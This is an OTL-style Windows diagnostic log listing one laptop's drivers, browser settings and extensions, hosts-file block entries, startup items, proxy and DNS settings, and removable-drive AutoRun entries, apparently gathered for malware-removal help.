DRV:64bit: - (btwavdt) -- C:\Windows\SysNative\drivers\btwavdt.sys (Broadcom Corporation.)
DRV:64bit: - (btwrchid) -- C:\Windows\SysNative\drivers\btwrchid.sys (Broadcom Corporation.)
DRV:64bit: - (SrvHsfV92) -- C:\Windows\SysNative\drivers\VSTDPV6.SYS (Conexant Systems, Inc.)
DRV:64bit: - (SrvHsfWinac) -- C:\Windows\SysNative\drivers\VSTCNXT6.SYS (Conexant Systems, Inc.)
DRV:64bit: - (SrvHsfHDA) -- C:\Windows\SysNative\drivers\VSTAZL6.SYS (Conexant Systems, Inc.)
DRV:64bit: - (igfx) -- C:\Windows\SysNative\drivers\igdkmd64.sys (Intel Corporation)
DRV:64bit: - (BCM43XX) -- C:\Windows\SysNative\drivers\BCMWL664.SYS (Broadcom Corporation)
DRV:64bit: - (ebdrv) -- C:\Windows\SysNative\drivers\evbda.sys (Broadcom Corporation)
DRV:64bit: - (b06bdrv) -- C:\Windows\SysNative\drivers\bxvbda.sys (Broadcom Corporation)
DRV:64bit: - (hcw85cir) -- C:\Windows\SysNative\drivers\hcw85cir.sys (Hauppauge Computer Works, Inc.)
DRV:64bit: - (TcUsb) -- C:\Windows\SysNative\drivers\tcusb.sys (UPEK Inc.)
DRV:64bit: - (iaStor) -- C:\Windows\SysNative\drivers\iaStor.sys (Intel Corporation)
DRV:64bit: - (b57nd60a) -- C:\Windows\SysNative\drivers\b57nd60a.sys (Broadcom Corporation)
DRV:64bit: - (ApfiltrService) -- C:\Windows\SysNative\drivers\Apfiltr.sys (Alps Electric Co., Ltd.)
DRV:64bit: - (GEARAspiWDM) -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys (GEAR Software Inc.)
DRV:64bit: - (netw5v64) Intel(R) -- C:\Windows\SysNative\drivers\NETw5v64.sys (Intel Corporation)
DRV:64bit: - (O2SDRDR) -- C:\Windows\SysNative\drivers\o2sdx64.sys (O2Micro )
DRV:64bit: - (O2MDRDR) -- C:\Windows\SysNative\drivers\o2mdx64.sys (O2Micro )
DRV:64bit: - (btwl2cap) -- C:\Windows\SysNative\drivers\btwl2cap.sys (Broadcom Corporation.)
DRV:64bit: - (DNE) -- C:\Windows\SysNative\drivers\dne64x.sys (Deterministic Networks, Inc.)
DRV:64bit: - (s0017unic) Sony Ericsson Device 0017 USB Ethernet Emulation SEMC0017 (WDM) -- C:\Windows\SysNative\drivers\s0017unic.sys (MCCI Corporation)
DRV:64bit: - (s0017obex) -- C:\Windows\SysNative\drivers\s0017obex.sys (MCCI Corporation)
DRV:64bit: - (s0017nd5) Sony Ericsson Device 0017 USB Ethernet Emulation SEMC0017 (NDIS) -- C:\Windows\SysNative\drivers\s0017nd5.sys (MCCI Corporation)
DRV:64bit: - (s0017mdm) -- C:\Windows\SysNative\drivers\s0017mdm.sys (MCCI Corporation)
DRV:64bit: - (s0017mgmt) Sony Ericsson Device 0017 USB WMC Device Management Drivers (WDM) -- C:\Windows\SysNative\drivers\s0017mgmt.sys (MCCI Corporation)
DRV:64bit: - (s0017mdfl) -- C:\Windows\SysNative\drivers\s0017mdfl.sys (MCCI Corporation)
DRV:64bit: - (s0017bus) Sony Ericsson Device 0017 driver (WDM) -- C:\Windows\SysNative\drivers\s0017bus.sys (MCCI Corporation)
DRV:64bit: - (RtlProt) -- C:\Windows\SysNative\drivers\RtlProt.sys (Windows (R) Codename Longhorn DDK provider)
DRV:64bit: - (HSF_DPV) -- C:\Windows\SysNative\drivers\CAX_DPV.sys (Conexant Systems, Inc.)
DRV:64bit: - (CAXHWAZL) -- C:\Windows\SysNative\drivers\CAXHWAZL.sys (Conexant Systems, Inc.)
DRV:64bit: - (winachsf) -- C:\Windows\SysNative\drivers\CAX_CNXT.sys (Conexant Systems, Inc.)
DRV:64bit: - (XAudio) -- C:\Windows\SysNative\drivers\XAudio64.sys (Conexant Systems, Inc.)
DRV:64bit: - (mdmxsdk) -- C:\Windows\SysNative\drivers\mdmxsdk.sys (Conexant)
DRV - (SbieDrv) -- C:\Programme\Sandboxie\SbieDrv.sys (SANDBOXIE L.T.D)
DRV - (WinRing0_1_2_0) -- C:\Users\..\AppData\Local\Microsoft\Windows Sidebar\Gadgets\IntelCoreSeries25.gadget\WinRing0x64.sys (OpenLibSys.org)
DRV - (TuneUpUtilitiesDrv) -- C:\Program Files (x86)\TuneUp Utilities 2010\TuneUpUtilitiesDriver64.sys (TuneUp Software)
DRV - (WIMMount) -- C:\Windows\SysWOW64\drivers\wimmount.sys (Microsoft Corporation)
DRV - (int15) -- C:\Windows\SysWOW64\drivers\int15_64.sys (Acer, Inc.)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=travelmate_5730&r=27360610c126l03e8z155x4871j25s
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=travelmate_5730&r=27360610c126l03e8z155x4871j25s
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=travelmate_5730&r=27360610c126l03e8z155x4871j25s
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=travelmate_5730&r=27360610c126l03e8z155x4871j25s
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.netip.de/
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyServer" = 95.168.183.244:3128
 
========== FireFox ==========
 
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0020-ABCDEFFEDCBA}:6.0.20
 
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin: C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\system32\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX,Inc.)
FF - HKLM\Software\MozillaPlugins\@Google.com/GoogleEarthPlugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin: C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files (x86)\Microsoft Silverlight\4.0.60531.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nosltd.com/getPlus+(R),version=1.6.2.90: C:\Program Files (x86)\NOS\bin\np_gp.dll (NOS Microsystems Ltd.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=8: C:\Program Files (x86)\Google\Update\1.2.183.39\npGoogleOneClick8.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=1.1.4: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (the VideoLAN Team)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 6.0.1\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2011.08.31 14:52:10 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 6.0.1\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2011.07.02 16:48:43 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 3.1.13\extensions\\Components: C:\Program Files (x86)\Mozilla Thunderbird\components [2011.09.05 14:00:26 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 3.1.13\extensions\\Plugins: C:\Program Files (x86)\Mozilla Thunderbird\plugins [2011.07.02 16:48:43 | 000,000,000 | ---D | M]
 
[2010.06.10 19:31:26 | 000,000,000 | ---D | M] (No name found) -- C:\Users\..\AppData\Roaming\mozilla\Extensions
[2010.06.05 19:45:19 | 000,000,000 | ---D | M] (No name found) -- C:\Users\..\AppData\Roaming\mozilla\Extensions\{3550f703-e582-4d05-9a08-453d09bdfdc6}
[2010.09.01 21:27:39 | 000,000,000 | ---D | M] (No name found) -- C:\Users\..\AppData\Roaming\mozilla\Firefox\Profiles\238ofb09.default\extensions
[2011.09.06 00:14:08 | 000,000,000 | ---D | M] (No name found) -- C:\Users\..\AppData\Roaming\mozilla\Firefox\Profiles\bf27xuga.default\extensions
[2010.06.10 19:31:32 | 000,000,000 | ---D | M] (CookieCuller) -- C:\Users\..\AppData\Roaming\mozilla\Firefox\Profiles\bf27xuga.default\extensions\{99B98C2C-7274-45a3-A640-D9DF1A1C8460}
[2011.02.27 11:32:02 | 000,000,000 | ---D | M] (Torbutton) -- C:\Users\..\AppData\Roaming\mozilla\Firefox\Profiles\bf27xuga.default\extensions\{e0204bd5-9d31-402b-a99d-a6aa8ffebdca}
[2011.02.10 18:35:33 | 000,000,000 | ---D | M] (User Agent Switcher) -- C:\Users\..\AppData\Roaming\mozilla\Firefox\Profiles\bf27xuga.default\extensions\{e968fc70-8f95-4ab9-9e79-304de2a71ee1}
[2010.09.26 14:24:56 | 000,000,000 | ---D | M] (Edit Cookies) -- C:\Users\..\AppData\Roaming\mozilla\Firefox\Profiles\bf27xuga.default\extensions\{ea2b95c2-9be8-48ed-bdd1-5fcd2ad0ff99}
[2010.11.19 23:38:12 | 000,000,000 | ---D | M] (German Dictionary) -- C:\Users\..\AppData\Roaming\mozilla\Firefox\Profiles\bf27xuga.default\extensions\de-DE@dictionaries.addons.mozilla.org
[2011.01.08 17:20:41 | 000,000,000 | ---D | M] (British English Dictionary) -- C:\Users\..\AppData\Roaming\mozilla\Firefox\Profiles\bf27xuga.default\extensions\en-GB@dictionaries.addons.mozilla.org
[2011.03.03 23:32:06 | 000,000,000 | ---D | M] (Fasterfox Lite) -- C:\Users\..\AppData\Roaming\mozilla\Firefox\Profiles\bf27xuga.default\extensions\FasterFox_Lite@BigRedBrent
[2011.08.14 17:22:27 | 000,000,000 | ---D | M] (HTTPS-Everywhere) -- C:\Users\..\AppData\Roaming\mozilla\Firefox\Profiles\bf27xuga.default\extensions\https-everywhere@eff.org
[2011.04.04 19:31:41 | 000,000,000 | ---D | M] (No name found) -- C:\Users\..\AppData\Roaming\mozilla\Firefox\Profiles\bf27xuga.default\extensions\nostmp
[2011.04.05 00:21:13 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\mozilla firefox\extensions
[2010.06.06 16:24:12 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files (x86)\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0020-ABCDEFFEDCBA}
[2011.04.05 00:21:13 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files (x86)\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA}
[2011.08.31 14:52:10 | 000,134,104 | ---- | M] (Mozilla Foundation) -- C:\Program Files (x86)\mozilla firefox\components\browsercomps.dll
[2010.09.15 04:50:38 | 000,472,808 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\npdeployJava1.dll
[2011.03.22 20:38:12 | 000,012,800 | ---- | M] (Nullsoft, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\npwachk.dll
[2010.01.01 10:00:00 | 000,001,392 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\amazondotcom-de.xml
[2010.01.01 10:00:00 | 000,002,252 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\bing.xml
[2010.01.01 10:00:00 | 000,001,153 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\eBay-de.xml
[2010.01.01 10:00:00 | 000,006,805 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\leo_ende_de.xml
[2010.01.01 10:00:00 | 000,001,178 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\wikipedia-de.xml
[2010.01.01 10:00:00 | 000,001,105 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\yahoo-de.xml
 
O1 HOSTS File: ([2011.08.31 15:02:45 | 000,437,299 | R--- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O1 - Hosts: 127.0.0.1	www.007guard.com
O1 - Hosts: 127.0.0.1	007guard.com
O1 - Hosts: 127.0.0.1	008i.com
O1 - Hosts: 127.0.0.1	www.008k.com
O1 - Hosts: 127.0.0.1	008k.com
O1 - Hosts: 127.0.0.1	www.00hq.com
O1 - Hosts: 127.0.0.1	00hq.com
O1 - Hosts: 127.0.0.1	010402.com
O1 - Hosts: 127.0.0.1	www.032439.com
O1 - Hosts: 127.0.0.1	032439.com
O1 - Hosts: 127.0.0.1	www.0scan.com
O1 - Hosts: 127.0.0.1	0scan.com
O1 - Hosts: 127.0.0.1	1000gratisproben.com
O1 - Hosts: 127.0.0.1	www.1000gratisproben.com
O1 - Hosts: 127.0.0.1	1001namen.com
O1 - Hosts: 127.0.0.1	www.1001namen.com
O1 - Hosts: 127.0.0.1	100888290cs.com
O1 - Hosts: 127.0.0.1	www.100888290cs.com
O1 - Hosts: 127.0.0.1	www.100sexlinks.com
O1 - Hosts: 127.0.0.1	100sexlinks.com
O1 - Hosts: 127.0.0.1	10sek.com
O1 - Hosts: 127.0.0.1	www.10sek.com
O1 - Hosts: 127.0.0.1	www.1-2005-search.com
O1 - Hosts: 127.0.0.1	1-2005-search.com
O1 - Hosts: 15041 more lines...
O2 - BHO: (Spybot-S&D IE Protection) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~2\SPYBOT~1\SDHelper.dll (Safer Networking Limited)
O3:64bit: - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O4:64bit: - HKLM..\Run: [Acronis Scheduler2 Service] C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe (Acronis)
O4:64bit: - HKLM..\Run: [Windows7FirewallControl] C:\Programme\Windows7FirewallControl\Windows7FirewallControl.exe (Sphinx Software)
O4 - HKLM..\Run: [avgnt] C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe (Avira GmbH)
O4 - HKLM..\Run: [Copperhead] C:\Program Files (x86)\Razer\Copperhead\razerhid.exe ()
O4 - HKLM..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe (Dritek System Inc.)
O4 - HKLM..\Run: [Malwarebytes' Anti-Malware (reboot)] C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbam.exe (Malwarebytes Corporation)
O4 - HKLM..\Run: [TrueImageMonitor.exe] C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe (Acronis)
O4 - HKCU..\Run: [RESTART_STICKY_NOTES]  File not found
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 255
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLinkedConnections = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DisableCAD = 1
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoRecentDocsNetHood = 1
O8:64bit: - Extra context menu item: Bild an &Bluetooth-Gerät senden... - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm ()
O8:64bit: - Extra context menu item: Seite an &Bluetooth-Gerät senden... - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()
O8 - Extra context menu item: Bild an &Bluetooth-Gerät senden... - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm ()
O8 - Extra context menu item: Seite an &Bluetooth-Gerät senden... - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()
O9:64bit: - Extra Button: Quick-Launch Area - {10954C80-4F0F-11d3-B17C-00C0DFE39736} - c:\Program Files (x86)\Acer Bio Protection\PwdBank.exe (Egis Technology Inc.)
O9:64bit: - Extra 'Tools' menuitem : Quick-Launch Area - {10954C80-4F0F-11d3-B17C-00C0DFE39736} - c:\Program Files (x86)\Acer Bio Protection\PwdBank.exe (Egis Technology Inc.)
O9:64bit: - Extra Button: @C:\Program Files\WIDCOMM\Bluetooth Software\btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()
O9:64bit: - Extra 'Tools' menuitem : @C:\Program Files\WIDCOMM\Bluetooth Software\btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()
O9 - Extra Button: Quick-Launch Area - {10954C80-4F0F-11d3-B17C-00C0DFE39736} - c:\Program Files (x86)\Acer Bio Protection\PwdBank.exe (Egis Technology Inc.)
O9 - Extra 'Tools' menuitem : Quick-Launch Area - {10954C80-4F0F-11d3-B17C-00C0DFE39736} - c:\Program Files (x86)\Acer Bio Protection\PwdBank.exe (Egis Technology Inc.)
O9 - Extra Button: @C:\Windows\WindowsMobile\INetRepl.dll,-222 - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\Windows\WindowsMobile\INetRepl.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : @C:\Windows\WindowsMobile\INetRepl.dll,-223 - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Windows\WindowsMobile\INetRepl.dll (Microsoft Corporation)
O9 - Extra Button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\MICROS~3\Office12\REFIEBAR.DLL (Microsoft Corporation)
O9 - Extra Button: Senden an Bluetooth - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()
O9 - Extra 'Tools' menuitem : Senden an &Bluetooth-Gerät... - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()
O9 - Extra 'Tools' menuitem : Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~2\SPYBOT~1\SDHelper.dll (Safer Networking Limited)
O9 - Extra Button: ICQ6 - {E59EB121-F339-4851-A3BA-FE49C35617C2} - C:\Program Files (x86)\ICQ6.5\ICQ.exe (ICQ, LLC.)
O9 - Extra 'Tools' menuitem : ICQ6 - {E59EB121-F339-4851-A3BA-FE49C35617C2} - C:\Program Files (x86)\ICQ6.5\ICQ.exe (ICQ, LLC.)
O10:64bit: - NameSpace_Catalog5\Catalog_Entries\000000000006 [] -  File not found
O10:64bit: - NameSpace_Catalog5\Catalog_Entries\000000000009 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O10:64bit: - Protocol_Catalog9\Catalog_Entries\000000000001 -  File not found
O10:64bit: - Protocol_Catalog9\Catalog_Entries\000000000013 -  File not found
O10 - NameSpace_Catalog5\Catalog_Entries\000000000006 [] - C:\Windows\SysWOW64\PrxerNsp.dll (Initex Software)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000009 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - Protocol_Catalog9\Catalog_Entries\000000000001 - C:\Windows\SysWOW64\PrxerDrv.dll (Initex Software)
O10 - Protocol_Catalog9\Catalog_Entries\000000000013 - C:\Windows\SysWOW64\PrxerDrv.dll (Initex Software)
O13 - gopher Prefix: missing
O13 - gopher Prefix: missing
O16 - DPF: {67DABFBF-D0AB-41FA-9C46-CC0F21721616} hxxp://download.divx.com/player/DivXBrowserPlugin.cab (Reg Error: Key error.)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21)
O16 - DPF: {CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Reg Error: Key error.)
O16 - DPF: {67DABFBF-D0AB-41FA-9C46-CC0F21721616} hxxp://download.divx.com/player/DivXBrowserPlugin.cab (DivXBrowserPlugin Object)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O16 - DPF: {CAFEEFAC-0016-0000-0018-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_18-windows-i586.cab (Java Plug-in 1.6.0_18)
O16 - DPF: {CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 213.163.76.185 91.198.152.196
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{13D07167-8FEE-43C7-8BFF-7FC49B4BFB28}: DhcpNameServer = 213.163.76.185 91.198.152.196
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{ED8427A0-7F8F-4646-9252-17835DFFDCD7}: NameServer = 192.168.2.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{EF37F020-598B-4FE0-B117-2E729EAF804D}: NameServer = 8.8.8.1,192.168.2.1
O18:64bit: - Protocol\Handler\livecall {828030A1-22C1-4009-854F-8E305202313F} - Reg Error: Key error. File not found
O18:64bit: - Protocol\Handler\ms-help {314111c7-a502-11d2-bbca-00c04f8ec294} - Reg Error: Key error. File not found
O18:64bit: - Protocol\Handler\msnim {828030A1-22C1-4009-854F-8E305202313F} - Reg Error: Key error. File not found
O18:64bit: - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - Reg Error: Key error. File not found
O18 - Protocol\Handler\livecall {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~2\WIC4A1~1\MESSEN~1\MSGRAP~1.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msnim {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~2\WIC4A1~1\MESSEN~1\MSGRAP~1.DLL (Microsoft Corporation)
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Acer\Acer VCM\Skype4COM.dll (Skype Technologies)
O18:64bit: - Protocol\Filter\text/xml {807563E5-5146-11D5-A672-00B0D022E945} - C:\Programme\Common Files\Microsoft Shared\OFFICE12\MSOXMLMF.DLL (Microsoft Corporation)
O18 - Protocol\Filter\text/xml {807563E5-5146-11D5-A672-00B0D022E945} - C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE12\MSOXMLMF.DLL (Microsoft Corporation)
O20:64bit: - AppInit_DLLs: (avgrssta.dll) - C:\Windows\SysNative\avgrssta.dll (AVG Technologies CZ, s.r.o.)
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: VMApplet - (SystemPropertiesPerformance.exe) - C:\Windows\SysNative\SystemPropertiesPerformance.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: VMApplet - (/pagefile) -  File not found
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: GinaDLL - (C:\Windows\SYSTEM32\RtlGina\RtlGina.DLL) -  File not found
O20 - HKLM Winlogon: VMApplet - (/pagefile) -  File not found
O20:64bit: - Winlogon\Notify\spba: DllName - Reg Error: Key error. - C:\Programme\Common Files\SPBA\homefus2.dll (UPEK Inc.)
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - CLSID or File not found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - CLSID or File not found.
O22:64bit: - SharedTaskScheduler: {1984DD45-52CF-49cd-AB77-18F378FEA264} - FencesShellExt - C:\Program Files (x86)\Stardock\Fences\FencesMenu64.dll (Stardock)
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{a0636639-7093-11df-9bbf-001f16c300ec}\Shell - "" = AutoRun
O33 - MountPoints2\{a0636639-7093-11df-9bbf-001f16c300ec}\Shell\AutoRun\command - "" = F:\LaunchU3.exe -a
O33 - MountPoints2\{b7ecd3d8-a47b-11df-9c3c-001f16c300ec}\Shell - "" = AutoRun
O33 - MountPoints2\{b7ecd3d8-a47b-11df-9c3c-001f16c300ec}\Shell\AutoRun\command - "" = F:\Autorun.exe
O33 - MountPoints2\{d15c6270-ba2a-11e0-8ed6-08002700e846}\Shell - "" = AutoRun
O33 - MountPoints2\{d15c6270-ba2a-11e0-8ed6-08002700e846}\Shell\AutoRun\command - "" = C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL I:\index.html
O33 - MountPoints2\{f42880b9-f64a-11df-8a41-005056c00008}\Shell - "" = AutoRun
O33 - MountPoints2\{f42880b9-f64a-11df-8a41-005056c00008}\Shell\AutoRun\command - "" = I:\pushinst.exe
O33 - MountPoints2\K\Shell - "" = AutoRun
O33 - MountPoints2\K\Shell\AutoRun\command - "" = K:\LaunchU3.exe -a
O34 - HKLM BootExecute: (autocheck autochk *) -  File not found
O34 - HKLM BootExecute: (OODBS) -  File not found
O34 - HKLM BootExecute: (auto_reactivate C:\bootwiz\asrm.bin) -  File not found
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
 
NetSvcs:64bit: UxTuneUp - C:\Windows\SysNative\uxtuneup.dll (TuneUp Software)
NetSvcs:64bit: AppMgmt - C:\Windows\SysNative\appmgmts.dll (Microsoft Corporation)
 
MsConfig:64bit - StartUpFolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Acer VCM.lnk - C:\PROGRA~2\Acer\ACERVC~1\AcerVCM.exe - (Acer Incorporated)
MsConfig:64bit - StartUpFolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk - C:\Programme\WIDCOMM\Bluetooth Software\BTTray.exe - (Broadcom Corporation.)
MsConfig:64bit - StartUpReg: Apoint - hkey= - key= - C:\Programme\Apoint2K\Apoint.exe (Alps Electric Co., Ltd.)
MsConfig:64bit - StartUpReg: COMODO Internet Security - hkey= - key= -  File not found
MsConfig:64bit - StartUpReg: ePower_DMC - hkey= - key= - C:\Programme\Acer\Empowering Technology\ePower\ePower_DMC.exe (Acer Inc.)
